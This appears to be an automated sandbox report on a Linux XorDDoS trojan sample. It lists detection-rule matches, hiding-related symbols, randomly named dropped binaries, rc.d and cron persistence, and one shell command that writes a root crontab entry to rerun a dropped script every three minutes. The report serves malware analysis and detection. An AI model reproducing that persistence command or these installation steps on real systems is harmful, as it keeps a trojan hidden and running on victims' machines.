        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 1.elfELF static info symbol of initial sample: HideFile
        Source: 1.elfELF static info symbol of initial sample: HidePidPort
        Source: 1.elfELF static info symbol of initial sample: __after_morecore_hook
        Source: 1.elfELF static info symbol of initial sample: __free_hook
        Source: 1.elfELF static info symbol of initial sample: __libc_register_dl_open_hook
        Source: 1.elfELF static info symbol of initial sample: __libc_register_dlfcn_hook
        Source: 1.elfELF static info symbol of initial sample: __malloc_hook
        Source: 1.elfELF static info symbol of initial sample: __malloc_initialize_hook
        Source: 1.elfELF static info symbol of initial sample: __memalign_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: HideFile
        Source: libudev.so.11.drELF static info symbol of dropped file: HidePidPort
        Source: libudev.so.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __free_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __malloc_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: libudev.so.11.drELF static info symbol of dropped file: __memalign_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: HideFile
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: HidePidPort
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __free_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __malloc_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: ccxfvtbhgr.11.drELF static info symbol of dropped file: __memalign_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: HideFile
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: HidePidPort
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __free_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __malloc_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: ezztyrfjzf.11.drELF static info symbol of dropped file: __memalign_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: HideFile
        Source: dyuvutukki.11.drELF static info symbol of dropped file: HidePidPort
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __free_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __malloc_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: dyuvutukki.11.drELF static info symbol of dropped file: __memalign_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: HideFile
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: HidePidPort
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __free_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __malloc_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: vapcvdizxx.11.drELF static info symbol of dropped file: __memalign_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: HideFile
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: HidePidPort
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __free_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __malloc_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: lkzqkklpfr.11.drELF static info symbol of dropped file: __memalign_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: HideFile
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: HidePidPort
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __free_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __malloc_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: cpbnjarskl.11.drELF static info symbol of dropped file: __memalign_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: HideFile
        Source: uaewjndswe.11.drELF static info symbol of dropped file: HidePidPort
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __free_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __malloc_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: uaewjndswe.11.drELF static info symbol of dropped file: __memalign_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: HideFile
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: HidePidPort
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __free_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __malloc_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: efgdvbpuxx.11.drELF static info symbol of dropped file: __memalign_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: HideFile
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: HidePidPort
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __free_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __malloc_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: nxattrsdxm.11.drELF static info symbol of dropped file: __memalign_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: HideFile
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: HidePidPort
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __free_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __malloc_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: bjhrrojebv.11.drELF static info symbol of dropped file: __memalign_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: HideFile
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: HidePidPort
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __free_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __malloc_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: vlteqhfomz.11.drELF static info symbol of dropped file: __memalign_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: HideFile
        Source: wxysocrflf.11.drELF static info symbol of dropped file: HidePidPort
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __after_morecore_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __free_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __malloc_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: wxysocrflf.11.drELF static info symbol of dropped file: __memalign_hook
        Source: classification engineClassification label: mal100.troj.evad.linELF@0/19@10/0
        Source: /tmp/1.elf (PID: 6205)/run/gcc.pid: fgmoabirnicsesqjfpuivnebyqywfxxmJump to behavior

        Persistence and Installation Behavior

        barindex
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc1.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc2.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc3.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc4.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc5.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc.d/rc1.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc.d/rc2.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc.d/rc3.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc.d/rc4.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/rc.d/rc5.d/S901.elf -> /etc/init.d/1.elfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /etc/cron.hourly/gcc.shJump to behavior
        Source: /bin/sh (PID: 6210)File: /etc/crontabJump to behavior
        Source: /bin/sed (PID: 6211)File: /etc/crontabJump to behavior
        Source: /tmp/1.elf (PID: 6205)File written: /usr/lib/libudev.soJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/ccxfvtbhgrJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/ezztyrfjzfJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/dyuvutukkiJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/vapcvdizxxJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/lkzqkklpfrJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/cpbnjarsklJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/uaewjndsweJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/efgdvbpuxxJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/nxattrsdxmJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/bjhrrojebvJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/vlteqhfomzJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/wxysocrflfJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File written: /usr/bin/ssrfvzfvpkJump to dropped file
        Source: /tmp/1.elf (PID: 6205)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
        Source: /tmp/1.elf (PID: 6205)Reads from proc file: /proc/statJump to behavior
        Source: /tmp/1.elf (PID: 6205)Reads from proc file: /proc/meminfoJump to behavior
        Source: /tmp/1.elf (PID: 6205)Reads from proc file: /proc/cpuinfoJump to behavior
        Source: /sbin/update-rc.d (PID: 6215)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
        Source: /tmp/1.elf (PID: 6210)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"Jump to behavior
        Source: /tmp/1.elf (PID: 6205)Writes shell script file to disk with an unusual file extension: /etc/init.d/1.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/1.elf (PID: 6205)File: /etc/init.d/1.elfJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ccxfvtbhgrJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ezztyrfjzfJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/dyuvutukkiJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/vapcvdizxxJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/lkzqkklpfrJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/cpbnjarsklJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/uaewjndsweJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/efgdvbpuxxJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/nxattrsdxmJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/bjhrrojebvJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/vlteqhfomzJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/wxysocrflfJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ssrfvzfvpkJump to dropped file
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/uaewjndsweJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/wxysocrflfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ggufoivoipJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/fubjkoogooJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/ptcfhyyirfJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /tmp/1.elf (PID: 6205)File: /usr/bin/lkpssqmflqJump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6240)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6243)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6248)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6251)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6252)File: /usr/bin/ccxfvtbhgrJump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6259)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6262)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6267)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6270)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6271)File: /usr/bin/ezztyrfjzfJump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6276)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6280)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6283)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6287)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6288)File: /usr/bin/dyuvutukkiJump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6314)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6319)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6322)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6325)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6326)File: /usr/bin/vapcvdizxxJump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6331)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6334)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6339)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6342)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6343)File: /usr/bin/lkzqkklpfrJump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6348)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6352)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6356)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6359)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6360)File: /usr/bin/cpbnjarsklJump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6365)File: /usr/bin/uaewjndsweJump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6369)File: /usr/bin/uaewjndsweJump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6373)File: /usr/bin/uaewjndsweJump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6376)File: /usr/bin/uaewjndsweJump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6377)File: /usr/bin/uaewjndsweJump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6384)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6387)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6392)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6395)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6396)File: /usr/bin/efgdvbpuxxJump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6404)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6407)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6410)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6413)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6416)File: /usr/bin/nxattrsdxmJump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6421)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6426)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6429)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6432)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6433)File: /usr/bin/bjhrrojebvJump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6438)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6443)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6446)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6449)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6450)File: /usr/bin/vlteqhfomzJump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6455)File: /usr/bin/wxysocrflfJump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6459)File: /usr/bin/wxysocrflfJump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6463)File: /usr/bin/wxysocrflfJump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6466)File: /usr/bin/wxysocrflfJump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6467)File: /usr/bin/wxysocrflfJump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6472)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6476)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6480)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6481)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6484)File: /usr/bin/ssrfvzfvpkJump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6490)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6493)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6497)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6501)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6502)File: /usr/bin/bhmsjmfdgkJump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6507)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6511)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6515)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6520)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6521)File: /usr/bin/ctjziyscgaJump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6526)File: /usr/bin/ggufoivoipJump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6530)File: /usr/bin/ggufoivoipJump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6532)File: /usr/bin/ggufoivoipJump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6536)File: /usr/bin/ggufoivoipJump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6538)File: /usr/bin/ggufoivoipJump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6544)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6547)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6552)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6555)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6556)File: /usr/bin/gvjfjjanunJump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6564)File: /usr/bin/fubjkoogooJump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6568)File: /usr/bin/fubjkoogooJump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6569)File: /usr/bin/fubjkoogooJump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6572)File: /usr/bin/fubjkoogooJump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6573)File: /usr/bin/fubjkoogooJump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6580)File: /usr/bin/ptcfhyyirfJump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6584)File: /usr/bin/ptcfhyyirfJump to behavior
